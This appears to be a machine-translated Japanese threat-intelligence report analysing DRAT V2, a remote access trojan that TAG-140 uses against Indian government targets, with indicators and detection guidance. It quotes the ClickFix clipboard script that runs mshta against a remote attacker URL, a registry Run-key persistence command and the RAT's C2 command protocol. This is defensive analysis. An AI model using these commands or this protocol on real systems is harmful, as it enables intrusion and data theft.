DRAT V2:TAG-140の武器庫に更新されたDRATが登場

DRAT V2:TAG-140の武器庫に更新されたDRATが登場

Insikt Groupロゴ

Executive Summary

インドの政府機関を標的とした 最近 の TAG-140 キャンペーンの調査中に、Insikt Group は DRAT リモート アクセス トロイの木馬 (RAT) の改変亜種を特定し、これを DRAT V2 と指定しました。TAG-140は、Transparent Tribeのサブクラスターまたは運用関連会社であると評価された運用サブグループであるSideCopyと重複しています(APT36、ProjectM、またはMYTHIC LEOPARDとしても追跡されています)。TAG-140 は、マルウェアの武器庫と配信技術において、反復的な進歩と多様性を一貫して実証してきました。この最新のキャンペーンは、クローンプレスリリースポータルを介してインド国防省になりすまし、マルウェアアーキテクチャとコマンドアンドコントロール(C2)機能の両方にわずかではあるが顕著な変化を示しています。

DRAT V2の導入はTAG-140によるリモートアクセスツールの継続的な微調整を反映しており、.NETベースのバージョンのDRATから新しいDelphiコンパイル型の亜種に移行します。どちらのバージョンも、CurlBack、SparkRAT、AresRAT、Xeno RAT、AllaKore、ReverseRATなど、このグループが利用してきた多数のRATの間で、マルウェアを入れ替えながら使用しているパターンを示しています。DRAT V2は、カスタムのTCPベースでサーバーが開始するC2プロトコルを更新し、任意のシェルコマンドの実行や強化されたファイルシステムの操作などの機能を拡張します。

感染チェーンを分析したところ、最初のアクセスはClickFixスタイルのソーシャルエンジニアリングルアーを介して行われたことがわかりました。被害者は mshta.exe を介して悪意のあるスクリプトを実行するように誘惑されました。これにより、以前はTAG-140で使用されていたBroaderAspect.NETローダーが実行されました。BroaderAspectは永続性を確立し、その後のDRAT V2のインストールと実行を確立します。

Insikt Groupは、ドメインの重複、マルウェアの系統、インフラストラクチャの特性に基づき、この活動がTAG-140によるものであると中程度の確信を持って判断しています。DRAT V2の機能強化は、被害者ネットワーク全体でのカスタマイズされたポストエクスプロイトおよび横方向の移動におけるTAG-140の能力が向上する可能性を示唆しています。したがって、その出現は、脅威アクターの成熟した知識と、インドの防衛機関および政府機関を戦略的に標的にしていることを示す重要な指標です。

主な調査結果

背景

TAG-140は、Transparent Tribe(APT36、ProjectM、またはMYTHIC Leopardとしても追跡されている)のサブクラスターまたは運用関連会社であると評価されたパキスタン国家連携の APT (Advanced Persistent Threat)グループと疑われる、公に報告されたグループSidecopyと重複する脅威アクターグループです。少なくとも 2019 年から活動している TAG-140 は主にインド をターゲットに しています エンティティ、最近の活動は従来の政府、防衛、海事、学術部門を超えて、現在では同国の鉄道、石油・ガス、外務省に所属する組織にも拡大しています。

このグループは、スピアフィッシングキャンペーンの活用、配布にHTMLアプリケーション(HTA)またはMicrosoft Installer(MSI)パッケージを使用し、ソフトウェアの脆弱性(WinRARなど)を悪用し、CurlBack、SparkRAT、AresRAT、Xeno RAT、AllaKore、ReverseRAT、DRATなどのさまざまなRATを使用するなど、その技術における一貫した進化を実証しました(123)。彼らの感染チェーンは通常、Windows 環境と Linux 環境の両方を標的としています。

Insikt Group 最近の アーティファクト を分析しました ClickFix キャンペーン インド省を偽装し、TAG-140 脅威アクターに起因しています。 TAG-140は、悪意のあるドメインの 電子メール[.]gov[.]で[.]drdosurvey[.]info は、正規の政府 Web サイト mod[.]gov[.]で(urlscan.io)。クローンされた Web サイトは、本物のポータルの構造とレイアウトを複製し、2023 年 9 月から 2025 年 4 月までのプレスリリースをリストしました。ただし、2025年3月のリンクのみ活性化した。

image1.png
図 1: クローン国防部ポータル(情報源:Hunt.io)

2025 年 3 月にアクティブなリンクをクリックすると、ClickFix スタイルのソーシャル エンジニアリング攻撃が引き起こされました。Insikt Group は、TAG-140 Windows 感染チェーンの追加分析を実施し、2024 年後半に特定された TAG-140 活性に関する研究で Seqrite Labs が 報告 した感染チェーンに類似していると判断しました。感染チェーンの分析(図2)により、最終的なペイロードはDRATの新しいDelphiベースの亜種(DRAT V2と呼ばれる)であることが明らかになりました。以前は、DRAT は .NET で開発され、2023 年に初めて SideCopy アクティビティに 起因 していました。更新されたバリアントには、新しいコマンド機能とわずかに変更された C2 プロトコルが含まれています。

image5.png
図 2: TAG-140感染連鎖滴下DRAT V2 (情報源: Recorded Future)

1.ユーザーは以下の URL (urlscan.io) に誘導されます。TAG-140の手口、戦術、テクニック、手順(TTP(戦術・技術・手順))に基づくと、使用された配信メカニズムはわかりませんが、これはユーザーにリンクをクリックさせるスピアフィッシングメールとして配信される可能性があります。 次に、ユーザーは「2025 年 3 月リリース」リンクをクリックするように誘導されます。Windows マシンから、そのリンクをクリックすると、ユーザーは Uniform Resource Identifier (URI) /captcha/windows.php にリダイレクトされます。

hxxps://email[.]gov[.]in[.]drdosurvey[.]info/content/press-releases-ministry-defence-0.html

2。リダイレクトされたウェブサイト(urlscan.io)「**開示-公的な使用のみ(FOUO)**」という警告を表示し、ユーザーに「続行」をクリックするように求めます。

3. 「続行」をクリックすると、以下の悪意のあるコマンドをクリップボードにコピーするJavaScriptが実行され、コマンドシェルに貼り付けて実行するようにユーザーに指示します。このコマンドは、mshta.exeを使用してリモート・スクリプト (index.php/sysinte.hta) を取得して実行します。TAG-140のインフラから、_trade4wealth[.]で_。

const calcPath = "C:\\Windows\\System32\\mshta.exe
hxxps://trade4wealth[.]in/admin/assets/css/default/index.php";
navigator.clipboard.writeText(calcPath)

4。index.php/sysinte.htaを実行すると、Seqrite Labsによって最初に報告された、BroaderAspectローダーが作成されて実行されます。BroaderAspectは次のアクションを実行します。

ある。次の URL からおとりドキュメント survey.pdfをダウンロードして開きます。

hxxps://trade4wealth[.]in/admin/assets/css/Vertical-layout-design/01/survey.pdf

b.noway.batという名前のWindowsバッチファイルを作成して実行します。これには、Microsoft が定義した自動起動の場所にレジストリ エントリを追加することで、DRAT v2 の永続性を確立するコマンドが含まれています

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Edgre" /t REG_SZ /F /D "cmd /C start C:\Users\Public\USOShared-1de48789-1285\zuidrt.pdf

c. 次の URL から DRAT V2 ペイロードをダウンロードして解凍します。

Initial Request: hxxps://trade4wealth[.]in/admin/assets/css/Vertical-layout-design/02
Redirect: hxxps://trade4wealth[.]in/admin/assets/css/Vertical-layout-design/02/ayty.ert

d. 次のコマンドを使用して DRAT V2 を実行します。

C:\Windows\system32\cmd.exe /c cmd /C スタート
C:\Users\Public\USOShared-1de48789-1285\zuidrt.pdf

Insikt Groupは、以下の点に基づき、中程度の確信を持ってこの活動がTAG-140によるものであると判断しています。

  1. インド国防省などのインドの防衛組織を偽装して標的とする行為は、既知のTAG-140の標的と一致しています。
  2. TAG-140 (1, 2) のみが使用していると思われる BroaderAspect ローダーと DRAT (どちらのバリエーション) の使用も、TAG-140 TTP (戦術・技術・手順) と一致しています。
  3. ドメインの電子メール[.]gov[.]で[.]drdosurvey[.]情報他の APT36 攻撃 (12) と重複し、ホスティング プロバイダーとして Namecheap を使用します。TAG-140 は GoDaddy および Hostinger (1234) とともに Namecheap を一般的に使用していることが複数の例で観察されています。
  4. DRAT V2に加えて、TAG-140は以前にオープンソースのAllaKore RATなどのDelphiベースのマルウェアを使用していました。

技術的分析

DRAT V2はDelphiで開発された軽量RATであり、2023年にTAG-140に初めて関連付けられた以前の.NETベースの亜種の進化形です。DRAT V2では、前バージョンからいくつかの更新が導入されています。

3にDRAT V2の概要を示します。

image10.png
図 3: DRAT V2 summary (情報源: Recorded Future)

DRAT V2は、TAG-140オペレーターが侵害されたホストと多様な対話を行うことを可能にする一連のコマンドをサポートしています。通信が確立されると、マルウェアはC2サーバーからの指示を受動的に待ちます。サポートされている操作には、システムの偵察(ユーザー名、オペレーティングシステムのバージョン、システム時間、現在の作業ディレクトリの収集)、接続性の検証、ローカルファイルシステムおよびディレクトリの列挙が含まれます。

偵察のみならず、DRAT V2はターゲット環境とのより積極的な関与を可能にします。ホストとC2インフラストラクチャ間で双方向のファイル転送を可能にし、オペレーターが追加のペイロードをアップロードしたり、データを流出させたりすることができます。さらに、ローカルファイルと任意のWindowsシェルコマンドの実行をサポートし、出力をC2に返します。これらの機能により、TAG-140は感染したシステムを持続的かつ柔軟に制御し、補助的なマルウェアツールを展開することなく、自動化および対話型のポストエクスプロイト活動を可能にします。図4は、DRAT V2の機能概要を示しています。

image7.png
図 4: DRAT V2 能力マトリックス (情報源: Recorded Future)

DRAT V2 コマンド

DRAT V2は、侵害されたホストにおけるリモート制御機能をサポートするために、テキストベースのサーバー開始のカスタムTCPプロトコルであるコマンドインターフェースを引き続き使用します。構造化された形式を通じて、コマンドの実行、ファイルの操作、システムの偵察が可能です。

DRAT V2コマンドプロトコルは、区切り文字としてチルダ(~)とパイプ(|)文字を使用することで区別されます。C2インフラストラクチャとの接続が確立されると、マルウェアは受動状態に入り、サーバーからの指示を待機します。これらの命令は、ホスト偵察、ファイル管理、直接実行などの機能を含む9つの個別のコマンドタイプ(表1)にまたがります。各コマンドは決定論的な形式に従っており、オペレーターは一貫性を持ってオーバーヘッドを抑えつつ、侵害後のアクションを調整できます。

DRAT V2 コマンド
能力
説明
initial_infotonas
システム情報
このコマンドは、ユーザー名、OSバージョン、タイムスタンプ、作業ディレクトリなどのホスト環境の詳細を要求することにより、システムレベルの偵察を開始します。対応は7つのフィールドで構成されています。
sup
エコー/接続テスト
このコマンドは、侵害されたホストとのアクティブな通信を確認するために使用されます。
lst_of_sys_drvs
ボリューム一覧表示
このコマンドにより、DRAT V2はターゲットマシン上のアクセス可能な論理ドライブを列挙できます。
here_are_dir_details
ディレクトリとファイルを情報と共に一覧表示
このコマンドは、名前、サイズ、タイムスタンプ、パスなど、ディレクトリとファイルの構造化されたメタデータを取得します。特に、この実装には、フルパスが後続のエントリーと不適切に連結されるという欠陥があり、演算子の解析に影響を与える可能性があります。
filina_for_down
ファイルサイズ
このコマンドは、指定されたファイルのバイトサイズを取得するために使用されます。
file_upl
ファイルアップロード
このコマンドは、C2からターゲットホストへのファイル転送をサポートします。このコマンドは、ペイロードのステージングやセカンダリツールの展開を容易にするために、ファイルパスとサイズの両方を指定する必要があります。
this_filina_exec
ファイルの実行
このコマンドは、ホストシステム上で指定されたファイルを実行します。この機能により、ローカルファイルシステム内で追加のペイロードを配信したり、既存のバイナリを実行したりすることができます。
fil_down_confirmina
ファイルダウンロード
このコマンドは、被害者のシステムからC2サーバーへのファイルの流出を可能にします。他の対応とは異なり、応答ヘッダーは存在せず、生のファイル内容のみがC2に送信されます。
exec_this_comm
コマンドの実行
このコマンドは、感染したホスト上で任意のシェルコマンドの実行を許可します。これにより、インタラクティブな操作に大きな柔軟性が加わり、リアルタイムのタスク処理とオンデマンドでのポストエクスプロイト活動が可能になります。

表1: DRAT V2 コマンド (情報源: Recorded Future)

このコマンドセットにより、TAG-140は、ホストの偵察、データステージング、潜在的な横方向の移動を含む、ポストエクスプロイトのさまざまな目的をサポートできます。特に、DRAT V2は任意のコマンド実行をサポートすることで、前バージョンの機能を拡張しています。付録Bには、パラメータを含む各コマンドの詳細な内訳が記載されています。

図5 は、感染したホストとC2間のC2通信の例を示しています。この例では、C2 サーバーはコマンド exec_this_comm~whoami を送信し、感染したホストにコマンド whoami を実行するように指示します。その後、感染したホストはコマンドの出力で応答します。

image11.png
図 5: DRAT V2コマンド実行要求と対応 Wiresharkが記録・表示するパケット(情報源: Recorded Future)

DRAT vs DRAT V2

この比較分析では、オリジナルのDRATとDRAT V2の技術的および運用上の違いを強調しています。開発プラットフォームの移行は、マルウェアのコンパイル、実行、そして潜在的な検出方法に影響を与える重要なアーキテクチャの転換を示しています。両方の亜種は軽量RATとしての同様のコア機能を維持していますが、DRAT V2はコマンド構造、C2難読化技術、通信プロトコルにおいて重要な強化を導入し、文字列難読化の使用を最小限に抑えています。これらの適応は、TAG-140が回避能力、モジュール性、搾取後の作戦における柔軟性を向上させるために、ツールを進化させ続けていることを反映していると考えられます。

コマンドヘッダーのバリエーション

どちらの DRAT バリアントもリモート管理用に同様のコマンドを実装していますが、各バージョンではコマンド ヘッダーに異なる命名規則が使用されます。たとえば、DRAT のシステム情報コマンドには getInformitica というラベルが付けられていますが、DRAT V2 では initial_infotonas が使用されます。DRAT V2 では、感染したホスト上で任意のシェル コマンドを実行できるようにする新しいコマンド exec_this_comm も導入されましたが、これは元の DRAT には存在せず、エクスプロイト後の機能が拡張されたことを示しています。以下の比較表(表2)は、両方のバージョンのリクエストヘッダーと対応ヘッダーの詳細な行ごとの内訳を示しています。 この表では、緑色で強調表示されているコマンド マッピングは、両方のバリアントで機能的に保持されているコマンドを示し、黄色で強調表示されている項目は、DRAT V2 専用の新しい追加を表しています。

コマンド
DRAT コマンドヘッダー
DRAT V2 コマンドヘッダー
システム情報リクエスト
getInformitica
initial_infotonas
システム情報対応
informiticaBack|
my_ini_info|
エコー/接続テストリクエスト
sup
sup
エコー/接続テスト対応
supconfirm
hello_frm_me
ボリューム一覧表示リクエスト
ドライブリスト
lst_of_sys_drvs
ボリューム一覧表示対応
ドライブリスト
lst_of_sys_drvs
ディレクトリとファイルを情報で一覧表示する
依頼
enterPath
here_are_dir_details
ディレクトリとファイルを情報で一覧表示する
対応
enterPath
here_are_dir_details
ファイルサイズのリクエスト
fdl
filina_for_down
ファイルサイズ対応
fInfo
fileina_detailwa
ファイルアップロードのリクエスト
fup
file_upl
ファイルアップロードの対応
fupConfirm
file_upl_confrm
ファイル実行リクエスト
fupexec
this_filina_exec
ファイル実行対応
fupexec確認
ファイル実行
file_exec_confirm
ファイルダウンロードのリクエスト
fdlConfirm
fil_down_confirmina
コマンド実行リクエスト
exec_this_comm
コマンド実行対応
comm_resultwa
ファイルダウンロード対応
[File Content]
[File Content]

表2: DRATとDRAT V2のコマンド比較 (情報源: Recorded Future)

C2 Communicationsにおけるテキストフォーマット

両方のバージョンは、C2インタラクションにテキストベースの通信プロトコルを活用しています。しかし、エンコード要件が異なります。DRAT V2はUnicodeとASCIIの両方でコマンドを受け付けますが、常にASCIIで応答します。一方、オリジナルのDRATは入力と出力のどちらにもUnicodeを義務付けています(図6)。

image8.png
図6:Wiresharkで記録・表示されたDRAT V1のボリューム一覧表示のリクエストと対応(情報源:Recorded Future)

システム情報の相違点

システム情報対応 どちらのバージョンにも多くの類似点が含まれていますが、いくつかの違いには、Unicode のテキスト、異なるコマンド要求ヘッダー、および win-def の代わりに WinDefender が含まれており、どちらもハードコーディングされています。 最後に、システム情報対応におけるWindows版のフォーマットは、DRATとDRATV2で異なる。 DRAT はレジストリ キー Software\Microsoft\Windows NT\CurrentVersion\ProductName から値を返すだけですが、DRAT V2 は API 呼び出し GetVersionExW() を使用して Windows バージョンを取得し、情報源コードで Base64 でエンコードされたカスタム文字列を返します。 表 3 は 、2 つのコマンドの違いの概要を示しています。

システム情報の構成要素
DRATシステム情報対応
DRAT V2システム情報対応
コマンド区切り
インバウンドリクエストの「~」(チルダ)文字以降のデータ
インバウンドリクエストの「~」(チルダ)文字以降のデータ
N.A フィールド
ハードコードされた「N.A」
ハードコードされた「N.A」
Usernameフィールド
SystemInformation.Username() を介して取得されたユーザー名
ユーザー名は System:: Sysutils:: GetEnvironmentVariable (" ユーザー名 ") で取得しました
Windowsバージョンフィールド
取得された Windows バージョン: Software\Microsoft\Windows NT\CurrentVersion\ProductName

例: Windows 10 Pro

GetVersionExW() によって取得された Windows バージョンは、次のいずれかに変換されます。

  • V2luZG93cyAxMSBPUw==
    • Windows 11 OS
  • V2luZG93cyAxMCBPUw==
    • Windows 10 OS
  • V2luZG93cyA4IG9yIDEw
    • Windows 8または10
  • V2luZG93cyA3IE9T
    • Windows 7 OS
  • VW5rbm93biBXaW5kb3dzIFZlcnNpb24=
    • 不明な Windows バージョン
識別子フィールド
ハードコードされたWin Defender
ハードコーディングされた win-def
日付/時刻スタンプフィールド
現在の日付と時刻 (DD/MM/YYYY HH:MM:SS AM/PM 形式) で、DateTime.Now.ToString() で取得
YYYY-MM-DD HH:MM:SS 形式の現在の日付と時刻、SysUtils::Now() で取得
作業パスフィールド
作業ディレクトリの完全なパス
作業ディレクトリの完全なパス

表3: DRAT vs DRAT V2 システム情報要求および対応フィールド (情報源: Recorded Future)

C2難読化の相違点

どちらのDRATの亜種でも、C2情報はBase64でエンコードされています。DRATはC2 IPアドレスを直接エンコードしますが、DRAT V2は、Base64エンコードの前に次の文字列のいずれかをIPアドレスの先頭に追加することで、C2の難読化手法を変更します。

プレフィックス付きエンコードされた C2 IP の例: PD48Pjw+PD48Pjw+PD48Pjw+PD48PjE4NS4xMTcuOTAuMjEy
プレフィックス <><><><><><><><><><><>185.117.90.212 のデコードされた C2 IP の例

これらの先頭に追加されるパターンは、初歩的な整合性チェックとして機能したり、アナリストや自動化ツールによる些細なデコードを防ぐのに役立つ可能性があります。

文字列の難読化

文字列の難読化戦略はバリアント間でも異なります。DRAT は、コマンドと操作文字列の両方をエンコードするために、置換アルゴリズムを使用したより広範な方式を採用しています。一方、DRAT V2 は、Windows バージョンや C2 情報などの文字列を選択的に難読化しますが、コマンドヘッダーはプレーンテキストのままにします。DRAT V2におけるこの限定的な難読化アプローチは、ステルス性と構文解析の信頼性の間のトレードオフを示している可能性があります。

検知

image6.png 検知
Snort image3.png
  • DRATマルウェアのアウトバウンドC2通信の検出:これらのSnortルールを使用して、アウトバウンドDRATおよびDRAT V2 C2通信を検出します。
Sigma image4.png
  • 実行キーを使用したTAG-140の永続性の検出:このSigmaルールを使用して、バッチファイルのコマンドに終了引用符がない場合に、レジストリの実行キーを作成して永続性を確立するTAG-140攻撃を検出します。
YARA image12.png
  • TAG-140によって使用されるBroaderAspect Loaderを検出:このYARAルールを使用して、BroaderAspectマルウェアに関連する文字列を含むファイルを検出します。対象ファイルには、.pdfや.batが含まれます。ファイル拡張子と特定のマルウェア識別子。
  • TAG-140が使用するDRATマルウェアのDotNetおよびDelphiの亜種を検出するには、これらのYARAルールを使用してDRATおよびDRAT V2を検出します。

軽減策

今後の展望

TAG-140によるDRAT V2の導入は、同グループの長年の慣行である、幅広く互換性のあるリモートアクセス型トロイの木馬スイートの維持と一致しています。この継続的な多様化は、アトリビューション、検知、監視活動を複雑にしています。DRAT V2は決定的な進化ではなく、別のモジュールの追加であるように見えます。これにより、TAG-140がキャンペーン間でRATをローテーションし続け、署名を隠蔽し、運用の柔軟性を維持する可能性が高まります。

これらの課題にもかかわらず、DRAT V2 感染チェーンは、防御回避や分析回避技術の使用が限られています。コードの難読化、サンドボックス回避、または複雑なローダーの動作がないことにより、基本的なテレメトリと静的分析を通じて早期検知の可能性が高まります。セキュリティチームは、マルウェアツールや感染チェーンにおける継続的な実験を予測しておく必要があります。TAG-140の活動の可視性を維持するためには、特定のマルウェアファミリーではなく、スピアフィッシングインフラストラクチャ、ローダーの再利用、行動指標を監視することが重要です。

付録A:侵害を示す指標

DRAT V2

ce98542131598b7af5d8aa546efe8c33a9762fb70bff4574227ecaed7fff8802
0d68012308ea41c6327eeb73eea33f4fb657c4ee051e0d40a3ef9fc8992ed316
c73d278f7c30f8394aeb2ecbf8f646f10dcff1c617e1583c127e70c871e6f8b7

DRAT

830cd96aba6c328b1421bf64caa2b64f9e24d72c7118ff99d7ccac296e1bf13d
c328cec5d6062f200998b7680fab4ac311eafaf805ca43c487cda43498479e60

DRAT V2 C2

185[.]117[.]90[.]212:7771
154[.]38[.]175[.]83:3232
178[.]18[.]248[.]36:6372

DRAT C2

38[.]242[.]149[.]89:61101

付録B:DRAT V2コマンドパラメータと対応

システム情報

initial_infotonas コマンドは、ユーザー名、OS バージョン、タイムスタンプ、作業ディレクトリなどのホスト環境の詳細を要求することにより、システムレベルの偵察を開始します。対応は7つの分野にまたがって構成されています。

システム情報リクエストヘッダー
パラメータ
パラメータの説明
initial_infotonas
1
不明:連続番号が観測されました
システム情報対応ヘッダー
パラメータ
パラメータの説明
my_ini_info|
7
1:インバウンドリクエストの「~」(チルダ)文字以降のデータ
2: ハードコードされた文字列"N.A"
3: System::Sysutils::GetEnvironmentVariable("USERNAME") を介して取得されたユーザー名

4: GetVersionExW() によって取得された Windows バージョンで、次のいずれかに変換され、情報源コードで Base64 でエンコードされています。

  • Windows 11 OS
  • Windows 10 OS
  • Windows 8または10
  • Windows 7 OS
  • 不明な Windows バージョン
5: ハードコーディングされた文字列 win-def
6: System::Sysutils::Now() を介して取得された YYYY-MM-DD HH:MM:SS 形式の現在の日付と時刻
7:作業ディレクトリのフルパス

エコー/接続テスト

sup コマンドは、侵害、ハッキング ホストとのアクティブな通信を確認するために使用されます。

エコー/接続テストリクエストヘッダー
パラメータ
パラメータの説明
sup
0
コマンド実行対応ヘッダー
パラメータ
パラメータの説明
hello_frm_me
0

ボリューム一覧表示

lst_of_sys_drvsコマンドを使用すると、DRAT V2はターゲットマシン上でアクセス可能な論理ドライブを列挙できます。

ボリューム一覧表示リクエストヘッダー
パラメータ
パラメータの説明
lst_of_sys_drvs
0
ボリューム一覧表示対応ヘッダー
パラメータ
パラメータの説明
lst_of_sys_drvs
1
次の形式のボリュームのリスト:
[
ボリュームレター1]:\ 1000000\ r\n [
ボリュームレター2] 1000000\ r\n [
ボリュームレターn] 1000000\ r\

属性を含むディレクトリを一覧表示

here_are_dir_details コマンドは、ディレクトリとファイルの構造化メタデータ (名前、サイズ、タイムスタンプ、パスなど) を取得します。特に、この実装には、フルパスが後続のエントリと不適切に連結され、演算子の解析に影響を与える可能性があるという欠陥が含まれています。

ディレクトリ一覧表示リクエストヘッダー
パラメータ
パラメータの説明
here_are_dir_details
1
ディレクトリパス
ディレクトリ一覧表示対応ヘッダー
パラメータ
パラメータの説明
here_are_dir_details
1

次の形式で属性を持つサブディレクトリとファイルのリスト(「+」区切り):

  • ディレクトリまたはファイル名
  • ファイルサイズ(バイト単位)またはディレクトリの場合は「N/A」
  • Sysutils::FileAge またはディレクトリの既定の 1899-12-29 00:00:00 を使用したファイルのタイムスタンプ
  • フルパス

ファイルサイズ

filina_for_down コマンドは、指定されたファイルのバイト・サイズを取得するために使用されます。

ファイルサイズリクエストヘッダー
パラメータ
パラメータの説明
filina_for_down
1
ファイルパス
ファイルサイズ対応ヘッダー
パラメータ
パラメータの説明
fileina_detailwa
1
バイト数で示されたファイルのサイズ

ファイルアップロード

file_upl~ コマンドは、C2 からターゲット ホストへのファイルの転送をサポートします。このコマンドでは、ファイル パスとサイズの両方を指定する必要があるため、ペイロードのステージングやセカンダリ ツールの展開が容易になります。

ファイルアップロードリクエストヘッダー
パラメータ
パラメータの説明
fil_upl~
2
ファイルパスとサイズ
ファイルアップロード対応ヘッダー
パラメータ
パラメータの説明
fil_upl_confrm
0

ファイルの実行

this_filina_exec コマンドは、ホスト・システム上で指定されたファイルを実行します。この機能により、追加のペイロードの配信や、ローカルファイルシステム内の既存のバイナリの実行が可能になります。

ファイル実行リクエストヘッダー
パラメータ
パラメータの説明
this_filina_exec
1
実行するファイルのフルパス
ファイル実行対応
file_exec_confirm

ファイルダウンロード

fil_down_confirmina コマンドを使用すると、被害者のシステムから C2 サーバーへのファイルの流出が可能になります。他の対応とは異なり、対応ヘッダーはなく、生ファイルの内容のみがC2に送信されます。

ファイルダウンロードリクエストヘッダー
パラメータ
パラメータの説明
fil_down_confirmina
1
ダウンロードするファイルのフルパス
ファイルダウンロード対応ヘッダー
パラメータ
パラメータの説明
ヘッダーがありません
0
生ファイルの内容

コマンドの実行

exec_this_commコマンドは、感染したホスト上で任意のシェルコマンドを実行できます。これにより、インタラクティブな操作に大きな柔軟性が加わり、リアルタイムのタスク処理とオンデマンドのエクスプロイト後のアクティビティが可能になります。

コマンド実行リクエストヘッダー
パラメータ
パラメータの説明
exec_this_comm
1
Windowsコマンド
コマンド実行対応ヘッダー
パラメータ
パラメータの説明
comm_resultwa
1
要求されたWindowsコマンドの対応

分析全文を読むには、ここをクリックしてレポートをPDF形式でダウンロードしてください。